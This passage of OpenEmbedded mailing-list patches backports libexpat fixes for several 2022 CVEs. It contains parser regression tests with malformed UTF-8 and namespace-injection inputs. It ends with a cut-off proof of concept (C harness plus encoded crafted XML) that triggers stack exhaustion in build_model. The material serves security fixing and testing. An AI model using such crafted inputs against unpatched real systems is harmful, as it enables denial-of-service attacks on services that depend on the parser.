++      {false, false, "\xCC\x01"}, // [1100 1100] [<0>000 0001]
++      {false, false, "\xCC\xC1"}, // [1100 1100] [1<1>00 0001]
++
++      // 3-byte UTF-8: [1110 xxxx] [10xx xxxx] [10xxxxxx]
++      {true, true, "\xE0\xA4\x85"},   // [1110 0000] [1010 0100] [1000 0101] =
++                                      // Devanagari Letter A U+0905
++      {false, false, "\xA0\xA4\x85"}, // [1<0>10 0000] [1010 0100] [1000 0101]
++      {false, false, "\xE0\x24\x85"}, // [1110 0000] [<0>010 0100] [1000 0101]
++      {false, false, "\xE0\xE4\x85"}, // [1110 0000] [1<1>10 0100] [1000 0101]
++      {false, false, "\xE0\xA4\x05"}, // [1110 0000] [1010 0100] [<0>000 0101]
++      {false, false, "\xE0\xA4\xC5"}, // [1110 0000] [1010 0100] [1<1>00 0101]
++      {true, false, "\xE0\xA4\x81"},  // [1110 0000] [1010 0100] [1000 0001] =
++                                      // combining char U+0901
++      {false, false, "\xA0\xA4\x81"}, // [1<0>10 0000] [1010 0100] [1000 0001]
++      {false, false, "\xE0\x24\x81"}, // [1110 0000] [<0>010 0100] [1000 0001]
++      {false, false, "\xE0\xE4\x81"}, // [1110 0000] [1<1>10 0100] [1000 0001]
++      {false, false, "\xE0\xA4\x01"}, // [1110 0000] [1010 0100] [<0>000 0001]
++      {false, false, "\xE0\xA4\xC1"}, // [1110 0000] [1010 0100] [1<1>00 0001]
++  };
++  const bool atNameStart[] = {true, false};
++
++  size_t i = 0;
++  char doc[1024];
++  size_t failCount = 0;
++
++  for (; i < sizeof(cases) / sizeof(cases[0]); i++) {
++    size_t j = 0;
++    for (; j < sizeof(atNameStart) / sizeof(atNameStart[0]); j++) {
++      const bool expectedSuccess
++          = atNameStart[j] ? cases[i].goodNameStart : cases[i].goodName;
++      sprintf(doc, "<%s%s><!--", atNameStart[j] ? "" : "a", cases[i].tagName);
++      XML_Parser parser = XML_ParserCreate(NULL);
++
++      const enum XML_Status status
++          = XML_Parse(parser, doc, (int)strlen(doc), /*isFinal=*/XML_FALSE);
++
++      bool success = true;
++      if ((status == XML_STATUS_OK) != expectedSuccess) {
++        success = false;
++      }
++      if ((status == XML_STATUS_ERROR)
++          && (XML_GetErrorCode(parser) != XML_ERROR_INVALID_TOKEN)) {
++        success = false;
++      }
++
++      if (! success) {
++        fprintf(
++            stderr,
++            "FAIL case %2u (%sat name start, %u-byte sequence, error code %d)\n",
++            (unsigned)i + 1u, atNameStart[j] ? "    " : "not ",
++            (unsigned)strlen(cases[i].tagName), XML_GetErrorCode(parser));
++        failCount++;
++      }
++
++      XML_ParserFree(parser);
++    }
++  }
++
++  if (failCount > 0) {
++    fail("UTF-8 regression detected");
++  }
++}
++END_TEST
++
+ /* Test trailing spaces in elements are accepted */
+ static void XMLCALL
+ record_element_end_handler(void *userData, const XML_Char *name) {
+@@ -6175,6 +6274,14 @@ START_TEST(test_bad_doctype) {
+ }
+ END_TEST
+ 
++START_TEST(test_bad_doctype_utf8) {
++  const char *text = "<!DOCTYPE \xDB\x25"
++                     "doc><doc/>"; // [1101 1011] [<0>010 0101]
++  expect_failure(text, XML_ERROR_INVALID_TOKEN,
++                 "Invalid UTF-8 in DOCTYPE not faulted");
++}
++END_TEST
++
+ START_TEST(test_bad_doctype_utf16) {
+   const char text[] =
+       /* <!DOCTYPE doc [ \x06f2 ]><doc/>
+@@ -11870,6 +11977,7 @@ make_suite(void) {
+   tcase_add_test(tc_basic, test_ext_entity_utf8_non_bom);
+   tcase_add_test(tc_basic, test_utf8_in_cdata_section);
+   tcase_add_test(tc_basic, test_utf8_in_cdata_section_2);
++  tcase_add_test(tc_basic, test_utf8_in_start_tags);
+   tcase_add_test(tc_basic, test_trailing_spaces_in_elements);
+   tcase_add_test(tc_basic, test_utf16_attribute);
+   tcase_add_test(tc_basic, test_utf16_second_attr);
+@@ -11878,6 +11986,7 @@ make_suite(void) {
+   tcase_add_test(tc_basic, test_bad_attr_desc_keyword);
+   tcase_add_test(tc_basic, test_bad_attr_desc_keyword_utf16);
+   tcase_add_test(tc_basic, test_bad_doctype);
++  tcase_add_test(tc_basic, test_bad_doctype_utf8);
+   tcase_add_test(tc_basic, test_bad_doctype_utf16);
+   tcase_add_test(tc_basic, test_bad_doctype_plus);
+   tcase_add_test(tc_basic, test_bad_doctype_star);
diff --git a/meta/recipes-core/expat/expat_2.2.9.bb b/meta/recipes-core/expat/expat_2.2.9.bb
index 4c86f90ef1..e59ff93df0 100644
--- a/meta/recipes-core/expat/expat_2.2.9.bb
+++ b/meta/recipes-core/expat/expat_2.2.9.bb
@@ -13,6 +13,7 @@ SRC_URI = "git://github.com/libexpat/libexpat.git;protocol=https;branch=master \
            file://CVE-2022-22822-27.patch \
            file://CVE-2022-23852.patch \
            file://CVE-2022-23990.patch \
+           file://CVE-2022-25235.patch \
            file://libtool-tag.patch \
          "
 

From patchwork Fri Mar  4 15:04:13 2022
Content-Type: text/plain; charset="utf-8"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
X-Patchwork-Submitter: Steve Sakoman <steve@sakoman.com>
X-Patchwork-Id: 4678
Return-Path: <steve@sakoman.com>
X-Spam-Checker-Version: SpamAssassin 3.4.0 (2014-02-07) on
	aws-us-west-2-korg-lkml-1.web.codeaurora.org
Received: from aws-us-west-2-korg-lkml-1.web.codeaurora.org
 (localhost.localdomain [127.0.0.1])
	by smtp.lore.kernel.org (Postfix) with ESMTP id 0361AC433F5
	for <webhook@archiver.kernel.org>; Fri,  4 Mar 2022 15:04:58 +0000 (UTC)
Received: from mail-pf1-f179.google.com (mail-pf1-f179.google.com
 [209.85.210.179])
 by mx.groups.io with SMTP id smtpd.web10.7844.1646406297422058949
 for <openembedded-core@lists.openembedded.org>;
 Fri, 04 Mar 2022 07:04:57 -0800
Authentication-Results: mx.groups.io;
 dkim=pass header.i=@sakoman-com.20210112.gappssmtp.com header.s=20210112
 header.b=QuOMS/ny;
 spf=softfail (domain: sakoman.com, ip: 209.85.210.179,
 mailfrom: steve@sakoman.com)
Received: by mail-pf1-f179.google.com with SMTP id t5so7841763pfg.4
        for <openembedded-core@lists.openembedded.org>;
 Fri, 04 Mar 2022 07:04:57 -0800 (PST)
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
        d=sakoman-com.20210112.gappssmtp.com; s=20210112;
        h=from:to:subject:date:message-id:in-reply-to:references:mime-version
         :content-transfer-encoding;
        bh=6UzuQVzHSo6u1OUUhuEu9mHXq8+iiAvipINSz4JPtLA=;
        b=QuOMS/ny2aABWjsa8RYIUfBYVqJXI1g2PyAgwitMbg8a7UQzhH37KiGYAtgev2cYAN
         yzRu+pVtYW/ale5iRkFWF5sz+54WmJ3jqI6UlYNpc5W48znpOSF0R7gYzIDYSl+hXgRa
         k7alAdj6f07cSJPbcmL8h9cC1Ai7JA77dSGSYhJ7f4fT7TskxomATcix+xie93pLLAqV
         R51XrZwThobpFtZKEEQABoHLeP98AK9yCmmxbavR1m+GVzAfnxZ8os1AQx8sRx/YiMSX
         9iveMKe0Db84VJLK2xU6lJx64swoPA6cltsn+kWIQkSbqp6UL0QkGe3/KnITdGjJcyEp
         L2AQ==
X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
        d=1e100.net; s=20210112;
        h=x-gm-message-state:from:to:subject:date:message-id:in-reply-to
         :references:mime-version:content-transfer-encoding;
        bh=6UzuQVzHSo6u1OUUhuEu9mHXq8+iiAvipINSz4JPtLA=;
        b=HgumpnYpFC7OX9ME3QNsS7iy/+/2rKdhhOQeVIM43y4MqyvK1YOmh1r35GFruPOprm
         J38vM7XNGFMZWWj3tnziA7F1ZJZjFc+CjFhm0fiT1BAtGdB6ywf7+2w7hqbHG1xrgRle
         wU+aDsgNs1cGFcL7nQu2XnG/LVJayxliaY0f+9wI+STZluwITM3xn/huExxEmXWD2/bT
         BSKZdSTg2VCqsUspl2cmtEuPjXvLAF2BJTKsInvzoaai50LICIv/UlNIufmWP3s8xLDD
         svSWQKhFmNnUaFryLx4XeY/CEOIEkjQ2xNrYsZpTxWwWydYgXn0vmElOc1mNjr92Ck4E
         RxYw==
X-Gm-Message-State: AOAM530RtIvv6ldKwkVd3xBA/1+5kP9k3sna2FJIjEV8OQRUU2McYagM
	5Yo0ms57z08agD/LmcmMHqY/BS5J4jkJE1ifjG4=
X-Google-Smtp-Source: 
 ABdhPJxRfdjgLvotcYw/Umkd3/XrJ2NI/kZjLZd4DGBSVyjVSXwSrNNaXh8J2YWX29LrSJa2YrKQgA==
X-Received: by 2002:a63:1c21:0:b0:374:104c:e4eb with SMTP id
 c33-20020a631c21000000b00374104ce4ebmr34622121pgc.556.1646406296350;
        Fri, 04 Mar 2022 07:04:56 -0800 (PST)
Received: from hexa.router0800d9.com (dhcp-72-253-6-214.hawaiiantel.net.
 [72.253.6.214])
        by smtp.gmail.com with ESMTPSA id
 f194-20020a6238cb000000b004f6ce898c61sm80400pfa.77.2022.03.04.07.04.55
        for <openembedded-core@lists.openembedded.org>
        (version=TLS1_3 cipher=TLS_AES_256_GCM_SHA384 bits=256/256);
        Fri, 04 Mar 2022 07:04:55 -0800 (PST)
From: Steve Sakoman <steve@sakoman.com>
To: openembedded-core@lists.openembedded.org
Subject: [OE-core][dunfell 05/18] expat: fix CVE-2022-25236
Date: Fri,  4 Mar 2022 05:04:13 -1000
Message-Id: 
 <72ab213c128ef75669447eadcae8219a9f87f941.1646406001.git.steve@sakoman.com>
X-Mailer: git-send-email 2.25.1
In-Reply-To: <cover.1646406001.git.steve@sakoman.com>
References: <cover.1646406001.git.steve@sakoman.com>
MIME-Version: 1.0
List-Id: <openembedded-core.lists.openembedded.org>
X-Webhook-Received: from li982-79.members.linode.com [45.33.32.79] by
 aws-us-west-2-korg-lkml-1.web.codeaurora.org with HTTPS for
 <openembedded-core@lists.openembedded.org>; Fri, 04 Mar 2022 15:04:58 -0000
X-Groupsio-URL: 
 https://lists.openembedded.org/g/openembedded-core/message/162724

xmlparse.c in Expat (aka libexpat) before 2.4.5 allows
attackers to insert namespace-separator characters into
namespace URIs.

Backport patches from:
https://github.com/libexpat/libexpat/pull/561/commits

CVE: CVE-2022-25236

Signed-off-by: Steve Sakoman <steve@sakoman.com>
---
 .../expat/expat/CVE-2022-25236.patch          | 129 ++++++++++++++++++
 meta/recipes-core/expat/expat_2.2.9.bb        |   1 +
 2 files changed, 130 insertions(+)
 create mode 100644 meta/recipes-core/expat/expat/CVE-2022-25236.patch

diff --git a/meta/recipes-core/expat/expat/CVE-2022-25236.patch b/meta/recipes-core/expat/expat/CVE-2022-25236.patch
new file mode 100644
index 0000000000..ba6443fc6a
--- /dev/null
+++ b/meta/recipes-core/expat/expat/CVE-2022-25236.patch
@@ -0,0 +1,129 @@
+From 6881a4fc8596307ab9ff2e85e605afa2e413ab71 Mon Sep 17 00:00:00 2001
+From: Sebastian Pipping <sebastian@pipping.org>
+Date: Sat, 12 Feb 2022 00:19:13 +0100
+Subject: [PATCH] lib: Fix (harmless) use of uninitialized memory
+
+Upstream-Status: Backport
+https://github.com/libexpat/libexpat/pull/561/commits
+
+CVE: CVE-2022-25236
+
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+
+---
+ expat/lib/xmlparse.c | 6 ++----
+ 1 file changed, 2 insertions(+), 4 deletions(-)
+
+diff --git a/lib/xmlparse.c b/lib/xmlparse.c
+index 902895d5..c768f856 100644
+--- a/lib/xmlparse.c
++++ b/lib/xmlparse.c
+@@ -718,8 +718,7 @@ XML_ParserCreate(const XML_Char *encodingName) {
+ 
+ XML_Parser XMLCALL
+ XML_ParserCreateNS(const XML_Char *encodingName, XML_Char nsSep) {
+-  XML_Char tmp[2];
+-  *tmp = nsSep;
++  XML_Char tmp[2] = {nsSep, 0};
+   return XML_ParserCreate_MM(encodingName, NULL, tmp);
+ }
+ 
+@@ -1344,8 +1343,7 @@ XML_ExternalEntityParserCreate(XML_Parser oldParser, const XML_Char *context,
+      would be otherwise.
+   */
+   if (parser->m_ns) {
+-    XML_Char tmp[2];
+-    *tmp = parser->m_namespaceSeparator;
++    XML_Char tmp[2] = {parser->m_namespaceSeparator, 0};
+     parser = parserCreate(encodingName, &parser->m_mem, tmp, newDtd);
+   } else {
+     parser = parserCreate(encodingName, &parser->m_mem, NULL, newDtd);
+From a2fe525e660badd64b6c557c2b1ec26ddc07f6e4 Mon Sep 17 00:00:00 2001
+From: Sebastian Pipping <sebastian@pipping.org>
+Date: Sat, 12 Feb 2022 01:09:29 +0100
+Subject: [PATCH] lib: Protect against malicious namespace declarations
+ (CVE-2022-25236)
+
+---
+ expat/lib/xmlparse.c | 11 +++++++++++
+ 1 file changed, 11 insertions(+)
+
+diff --git a/lib/xmlparse.c b/lib/xmlparse.c
+index c768f856..a3aef88c 100644
+--- a/lib/xmlparse.c
++++ b/lib/xmlparse.c
+@@ -3754,6 +3754,17 @@ addBinding(XML_Parser parser, PREFIX *prefix, const ATTRIBUTE_ID *attId,
+     if (! mustBeXML && isXMLNS
+         && (len > xmlnsLen || uri[len] != xmlnsNamespace[len]))
+       isXMLNS = XML_FALSE;
++
++    // NOTE: While Expat does not validate namespace URIs against RFC 3986,
++    //       we have to at least make sure that the XML processor on top of
++    //       Expat (that is splitting tag names by namespace separator into
++    //       2- or 3-tuples (uri-local or uri-local-prefix)) cannot be confused
++    //       by an attacker putting additional namespace separator characters
++    //       into namespace declarations.  That would be ambiguous and not to
++    //       be expected.
++    if (parser->m_ns && (uri[len] == parser->m_namespaceSeparator)) {
++      return XML_ERROR_SYNTAX;
++    }
+   }
+   isXML = isXML && len == xmlLen;
+   isXMLNS = isXMLNS && len == xmlnsLen;
+From 2de077423fb22750ebea599677d523b53cb93b1d Mon Sep 17 00:00:00 2001
+From: Sebastian Pipping <sebastian@pipping.org>
+Date: Sat, 12 Feb 2022 00:51:43 +0100
+Subject: [PATCH] tests: Cover CVE-2022-25236
+
+---
+ expat/tests/runtests.c | 30 ++++++++++++++++++++++++++++++
+ 1 file changed, 30 insertions(+)
+
+diff --git a/tests/runtests.c b/tests/runtests.c
+index d07203f2..bc5344b1 100644
+--- a/tests/runtests.c
++++ b/tests/runtests.c
+@@ -7220,6 +7220,35 @@ START_TEST(test_ns_double_colon_doctype) {
+ }
+ END_TEST
+ 
++START_TEST(test_ns_separator_in_uri) {
++  struct test_case {
++    enum XML_Status expectedStatus;
++    const char *doc;
++  };
++  struct test_case cases[] = {
++      {XML_STATUS_OK, "<doc xmlns='one_two' />"},
++      {XML_STATUS_ERROR, "<doc xmlns='one&#x0A;two' />"},
++  };
++
++  size_t i = 0;
++  size_t failCount = 0;
++  for (; i < sizeof(cases) / sizeof(cases[0]); i++) {
++    XML_Parser parser = XML_ParserCreateNS(NULL, '\n');
++    XML_SetElementHandler(parser, dummy_start_element, dummy_end_element);
++    if (XML_Parse(parser, cases[i].doc, (int)strlen(cases[i].doc),
++                  /*isFinal*/ XML_TRUE)
++        != cases[i].expectedStatus) {
++      failCount++;
++    }
++    XML_ParserFree(parser);
++  }
++
++  if (failCount) {
++    fail("Namespace separator handling is broken");
++  }
++}
++END_TEST
++
+ /* Control variable; the number of times duff_allocator() will successfully
+  * allocate */
+ #define ALLOC_ALWAYS_SUCCEED (-1)
+@@ -11905,6 +11934,7 @@ make_suite(void) {
+   tcase_add_test(tc_namespace, test_ns_utf16_doctype);
+   tcase_add_test(tc_namespace, test_ns_invalid_doctype);
+   tcase_add_test(tc_namespace, test_ns_double_colon_doctype);
++  tcase_add_test(tc_namespace, test_ns_separator_in_uri);
+ 
+   suite_add_tcase(s, tc_misc);
+   tcase_add_checked_fixture(tc_misc, NULL, basic_teardown);
diff --git a/meta/recipes-core/expat/expat_2.2.9.bb b/meta/recipes-core/expat/expat_2.2.9.bb
index e59ff93df0..c0103767b1 100644
--- a/meta/recipes-core/expat/expat_2.2.9.bb
+++ b/meta/recipes-core/expat/expat_2.2.9.bb
@@ -14,6 +14,7 @@ SRC_URI = "git://github.com/libexpat/libexpat.git;protocol=https;branch=master \
            file://CVE-2022-23852.patch \
            file://CVE-2022-23990.patch \
            file://CVE-2022-25235.patch \
+           file://CVE-2022-25236.patch \
            file://libtool-tag.patch \
          "
 

From patchwork Fri Mar  4 15:04:14 2022
Content-Type: text/plain; charset="utf-8"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
X-Patchwork-Submitter: Steve Sakoman <steve@sakoman.com>
X-Patchwork-Id: 4679
Return-Path: <steve@sakoman.com>
X-Spam-Checker-Version: SpamAssassin 3.4.0 (2014-02-07) on
	aws-us-west-2-korg-lkml-1.web.codeaurora.org
Received: from aws-us-west-2-korg-lkml-1.web.codeaurora.org
 (localhost.localdomain [127.0.0.1])
	by smtp.lore.kernel.org (Postfix) with ESMTP id 04A34C433F5
	for <webhook@archiver.kernel.org>; Fri,  4 Mar 2022 15:05:01 +0000 (UTC)
Received: from mail-pj1-f45.google.com (mail-pj1-f45.google.com
 [209.85.216.45])
 by mx.groups.io with SMTP id smtpd.web09.7897.1646406300040285012
 for <openembedded-core@lists.openembedded.org>;
 Fri, 04 Mar 2022 07:05:00 -0800
Authentication-Results: mx.groups.io;
 dkim=pass header.i=@sakoman-com.20210112.gappssmtp.com header.s=20210112
 header.b=volNHABH;
 spf=softfail (domain: sakoman.com, ip: 209.85.216.45,
 mailfrom: steve@sakoman.com)
Received: by mail-pj1-f45.google.com with SMTP id
 z12-20020a17090ad78c00b001bf022b69d6so7061167pju.2
        for <openembedded-core@lists.openembedded.org>;
 Fri, 04 Mar 2022 07:04:59 -0800 (PST)
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
        d=sakoman-com.20210112.gappssmtp.com; s=20210112;
        h=from:to:subject:date:message-id:in-reply-to:references:mime-version
         :content-transfer-encoding;
        bh=eVP1AmyGiQRKGlz+d+IgyahZ3cLxLJqpedWGZPy8t1s=;
        b=volNHABHakZA2sE/DVcrFBMrvHO7IftuLftK+OwrHJ6thIuKV64VxLozwzLClHlNia
         TbVdkRmcY5DCCw978WstLCK+yST0PnEcOC0lgPJuItUYtrvjv84A78i2VlJG1P0sh2yb
         HX6bAhHoe2vtwr8eCBGwns3KWMY3r1f6mNcVzJIhaEXSzxIFlHyEaY/g0FKftoxYBiJW
         fVKZtbdvdlqEgzMMyWo4v7yTyYWhYvKxyssWSK+a1Xwjl/EIm54VCg8IEJL7VJdpvRFi
         0Qg8D/xp/FZdlVvyZp5SK+fovLfDfQFgKeMJCpoROOIHBARBRB3cJFd4WMlHDJvnwXdk
         4FvA==
X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
        d=1e100.net; s=20210112;
        h=x-gm-message-state:from:to:subject:date:message-id:in-reply-to
         :references:mime-version:content-transfer-encoding;
        bh=eVP1AmyGiQRKGlz+d+IgyahZ3cLxLJqpedWGZPy8t1s=;
        b=Vg4YdsBGzrL8Q/8ojjGIg47dTmHxaiJpjj2HsokKe2jqu/W6emoNmajsrSsOY53fif
         lpTvFBTeQCyYPJazMzESpcc5azrhowgoDI/bT9MIxq6dBTrHoRbWZzTDtFXD2rzPgg7c
         JbCZFnkzQWJzd+faGn0Ojrf0EKAHj9gI4rlp0Ujr+CQGQhqeiJCz7zmWWpVy+VisSD8z
         CXea1QrGjz+FHJgdNn19UKy3+VPyc7UIkd7fWl5Z7YalxHYTPVL3v24Rx2EpE0HmPW0X
         timIlykyURlCCjPx1v9WZNz91vdDGVy/jEnC9UKpT4qj9QESHAEEPAMpmU8w+DrnfN+A
         ywDw==
X-Gm-Message-State: AOAM5325JtdRArOep8+gZnaB2saA+treVJHK0MOSm3Axgerml6uDM5lO
	cDhKRiwhWOqw8zvpJWCUOIM3/4UEsvW/O2Yj6+M=
X-Google-Smtp-Source: 
 ABdhPJy1pZYL8VPXwWY/E3YB22abXKnfCJIBDkSkDFh/A+WV+PmJKsySq+tWcnoU2NsLd8IfD5vInw==
X-Received: by 2002:a17:902:8a85:b0:151:b3c6:87f8 with SMTP id
 p5-20020a1709028a8500b00151b3c687f8mr6372553plo.129.1646406298516;
        Fri, 04 Mar 2022 07:04:58 -0800 (PST)
Received: from hexa.router0800d9.com (dhcp-72-253-6-214.hawaiiantel.net.
 [72.253.6.214])
        by smtp.gmail.com with ESMTPSA id
 f194-20020a6238cb000000b004f6ce898c61sm80400pfa.77.2022.03.04.07.04.57
        for <openembedded-core@lists.openembedded.org>
        (version=TLS1_3 cipher=TLS_AES_256_GCM_SHA384 bits=256/256);
        Fri, 04 Mar 2022 07:04:58 -0800 (PST)
From: Steve Sakoman <steve@sakoman.com>
To: openembedded-core@lists.openembedded.org
Subject: [OE-core][dunfell 06/18] expat: fix CVE-2022-25313
Date: Fri,  4 Mar 2022 05:04:14 -1000
Message-Id: 
 <8105700b1d6d23c87332f453bdc7379999bb4b03.1646406001.git.steve@sakoman.com>
X-Mailer: git-send-email 2.25.1
In-Reply-To: <cover.1646406001.git.steve@sakoman.com>
References: <cover.1646406001.git.steve@sakoman.com>
MIME-Version: 1.0
List-Id: <openembedded-core.lists.openembedded.org>
X-Webhook-Received: from li982-79.members.linode.com [45.33.32.79] by
 aws-us-west-2-korg-lkml-1.web.codeaurora.org with HTTPS for
 <openembedded-core@lists.openembedded.org>; Fri, 04 Mar 2022 15:05:01 -0000
X-Groupsio-URL: 
 https://lists.openembedded.org/g/openembedded-core/message/162725

In Expat (aka libexpat) before 2.4.5, an attacker can trigger stack
exhaustion in build_model via a large nesting depth in the DTD element.

Backport patch from:
https://github.com/libexpat/libexpat/pull/558/commits/9b4ce651b26557f16103c3a366c91934ecd439ab

Also add patch which fixes a regression introduced in the above fix:
https://github.com/libexpat/libexpat/pull/566

CVE: CVE-2022-25313

Signed-off-by: Steve Sakoman <steve@sakoman.com>
---
 .../expat/CVE-2022-25313-regression.patch     | 131 ++++++++++
 .../expat/expat/CVE-2022-25313.patch          | 230 ++++++++++++++++++
 meta/recipes-core/expat/expat_2.2.9.bb        |   2 +
 3 files changed, 363 insertions(+)
 create mode 100644 meta/recipes-core/expat/expat/CVE-2022-25313-regression.patch
 create mode 100644 meta/recipes-core/expat/expat/CVE-2022-25313.patch

diff --git a/meta/recipes-core/expat/expat/CVE-2022-25313-regression.patch b/meta/recipes-core/expat/expat/CVE-2022-25313-regression.patch
new file mode 100644
index 0000000000..af255e8cb5
--- /dev/null
+++ b/meta/recipes-core/expat/expat/CVE-2022-25313-regression.patch
@@ -0,0 +1,131 @@
+From b12f34fe32821a69dc12ff9a021daca0856de238 Mon Sep 17 00:00:00 2001
+From: Samanta Navarro <ferivoz@riseup.net>
+Date: Sat, 19 Feb 2022 23:59:25 +0000
+Subject: [PATCH] Fix build_model regression.
+
+The iterative approach in build_model failed to fill children arrays
+correctly. A preorder traversal is not required and turned out to be the
+culprit. Use an easier algorithm:
+
+Add nodes from scaffold tree starting at index 0 (root) to the target
+array whenever children are encountered. This ensures that children
+are adjacent to each other. This complies with the recursive version.
+
+Store only the scaffold index in numchildren field to prevent a direct
+processing of these children, which would require a recursive solution.
+This allows the algorithm to iterate through the target array from start
+to end without jumping back and forth, converting on the fly.
+
+Co-authored-by: Sebastian Pipping <sebastian@pipping.org>
+---
+ lib/xmlparse.c | 79 ++++++++++++++++++++++++++------------------
+ 1 file changed, 47 insertions(+), 32 deletions(-)
+
+diff --git a/lib/xmlparse.c b/lib/xmlparse.c
+index c479a258..84885b5a 100644
+--- a/lib/xmlparse.c
++++ b/lib/xmlparse.c
+@@ -7373,39 +7373,58 @@ build_model(XML_Parser parser) {
+    *
+    * The iterative approach works as follows:
+    *
+-   * - We use space in the target array for building a temporary stack structure
+-   *   while that space is still unused.
+-   *   The stack grows from the array's end downwards and the "actual data"
+-   *   grows from the start upwards, sequentially.
+-   *   (Because stack grows downwards, pushing onto the stack is a decrement
+-   *   while popping off the stack is an increment.)
++   * - We have two writing pointers, both walking up the result array; one does
++   *   the work, the other creates "jobs" for its colleague to do, and leads
++   *   the way:
+    *
+-   * - A stack element appears as a regular XML_Content node on the outside,
+-   *   but only uses a single field -- numchildren -- to store the source
+-   *   tree node array index.  These are the breadcrumbs leading the way back
+-   *   during pre-order (node first) depth-first traversal.
++   *   - The faster one, pointer jobDest, always leads and writes "what job
++   *     to do" by the other, once they reach that place in the
++   *     array: leader "jobDest" stores the source node array index (relative
++   *     to array dtd->scaffold) in field "numchildren".
+    *
+-   * - The reason we know the stack will never grow into (or overlap with)
+-   *   the area with data of value at the start of the array is because
+-   *   the overall number of elements to process matches the size of the array,
+-   *   and the sum of fully processed nodes and yet-to-be processed nodes
+-   *   on the stack, cannot be more than the total number of nodes.
+-   *   It is possible for the top of the stack and the about-to-write node
+-   *   to meet, but that is safe because we get the source index out
+-   *   before doing any writes on that node.
++   *   - The slower one, pointer dest, looks at the value stored in the
++   *     "numchildren" field (which actually holds a source node array index
++   *     at that time) and puts the real data from dtd->scaffold in.
++   *
++   * - Before the loop starts, jobDest writes source array index 0
++   *   (where the root node is located) so that dest will have something to do
++   *   when it starts operation.
++   *
++   * - Whenever nodes with children are encountered, jobDest appends
++   *   them as new jobs, in order.  As a result, tree node siblings are
++   *   adjacent in the resulting array, for example:
++   *
++   *     [0] root, has two children
++   *       [1] first child of 0, has three children
++   *         [3] first child of 1, does not have children
++   *         [4] second child of 1, does not have children
++   *         [5] third child of 1, does not have children
++   *       [2] second child of 0, does not have children
++   *
++   *   Or (the same data) presented in flat array view:
++   *
++   *     [0] root, has two children
++   *
++   *     [1] first child of 0, has three children
++   *     [2] second child of 0, does not have children
++   *
++   *     [3] first child of 1, does not have children
++   *     [4] second child of 1, does not have children
++   *     [5] third child of 1, does not have children
++   *
++   * - The algorithm repeats until all target array indices have been processed.
+    */
+   XML_Content *dest = ret; /* tree node writing location, moves upwards */
+   XML_Content *const destLimit = &ret[dtd->scaffCount];
+-  XML_Content *const stackBottom = &ret[dtd->scaffCount];
+-  XML_Content *stackTop = stackBottom; /* i.e. stack is initially empty */
++  XML_Content *jobDest = ret; /* next free writing location in target array */
+   str = (XML_Char *)&ret[dtd->scaffCount];
+ 
+-  /* Push source tree root node index onto the stack */
+-  (--stackTop)->numchildren = 0;
++  /* Add the starting job, the root node (index 0) of the source tree  */
++  (jobDest++)->numchildren = 0;
+ 
+   for (; dest < destLimit; dest++) {
+-    /* Pop source tree node index off the stack */
+-    const int src_node = (int)(stackTop++)->numchildren;
++    /* Retrieve source tree array index from job storage */
++    const int src_node = (int)dest->numchildren;
+ 
+     /* Convert item */
+     dest->type = dtd->scaffold[src_node].type;
+@@ -7427,16 +7446,12 @@ build_model(XML_Parser parser) {
+       int cn;
+       dest->name = NULL;
+       dest->numchildren = dtd->scaffold[src_node].childcnt;
+-      dest->children = &dest[1];
++      dest->children = jobDest;
+ 
+-      /* Push children to the stack
+-       * in a way where the first child ends up at the top of the
+-       * (downwards growing) stack, in order to be processed first. */
+-      stackTop -= dest->numchildren;
++      /* Append scaffold indices of children to array */
+       for (i = 0, cn = dtd->scaffold[src_node].firstchild;
+-           i < dest->numchildren; i++, cn = dtd->scaffold[cn].nextsib) {
+-        (stackTop + i)->numchildren = (unsigned int)cn;
+-      }
++           i < dest->numchildren; i++, cn = dtd->scaffold[cn].nextsib)
++        (jobDest++)->numchildren = (unsigned int)cn;
+     }
+   }
+ 
diff --git a/meta/recipes-core/expat/expat/CVE-2022-25313.patch b/meta/recipes-core/expat/expat/CVE-2022-25313.patch
new file mode 100644
index 0000000000..470d66e9dd
--- /dev/null
+++ b/meta/recipes-core/expat/expat/CVE-2022-25313.patch
@@ -0,0 +1,230 @@
+From 9b4ce651b26557f16103c3a366c91934ecd439ab Mon Sep 17 00:00:00 2001
+From: Samanta Navarro <ferivoz@riseup.net>
+Date: Tue, 15 Feb 2022 11:54:29 +0000
+Subject: [PATCH] Prevent stack exhaustion in build_model
+
+It is possible to trigger stack exhaustion in build_model function if
+depth of nested children in DTD element is large enough. This happens
+because build_node is a recursively called function within build_model.
+
+The code has been adjusted to run iteratively. It uses the already
+allocated heap space as temporary stack (growing from top to bottom).
+
+Output is identical to recursive version. No new fields in data
+structures were added, i.e. it keeps full API and ABI compatibility.
+Instead the numchildren variable is used to temporarily keep the
+index of items (uint vs int).
+
+Documentation and readability improvements kindly added by Sebastian.
+
+Proof of Concept:
+
+1. Compile poc binary which parses XML file line by line
+
+```
+cat > poc.c << EOF
+ #include <err.h>
+ #include <expat.h>
+ #include <stdio.h>
+
+ XML_Parser parser;
+
+ static void XMLCALL
+ dummy_element_decl_handler(void *userData, const XML_Char *name,
+                            XML_Content *model) {
+   XML_FreeContentModel(parser, model);
+ }
+
+ int main(int argc, char *argv[]) {
+   FILE *fp;
+   char *p = NULL;
+   size_t s = 0;
+   ssize_t l;
+   if (argc != 2)
+     errx(1, "usage: poc poc.xml");
+   if ((parser = XML_ParserCreate(NULL)) == NULL)
+     errx(1, "XML_ParserCreate");
+   XML_SetElementDeclHandler(parser, dummy_element_decl_handler);
+   if ((fp = fopen(argv[1], "r")) == NULL)
+     err(1, "fopen");
+   while ((l = getline(&p, &s, fp)) > 0)
+     if (XML_Parse(parser, p, (int)l, XML_FALSE) != XML_STATUS_OK)
+       errx(1, "XML_Parse");
+   XML_ParserFree(parser);
+   free(p);
+   fclose(fp);
+   return 0;
+ }
+EOF
+cc -std=c11 -D_POSIX_C_SOURCE=200809L -lexpat -o poc poc.c
+```
+
+2. Create XML file with a lot of nested groups in DTD element
+
+```
+cat > poc.xml.zst.b64 << EOF
+KLUv/aQkACAAPAEA+DwhRE9DVFlQRSB1d3UgWwo8IUVMRU1FTlQgdXd1CigBAHv/58AJAgAQKAIA
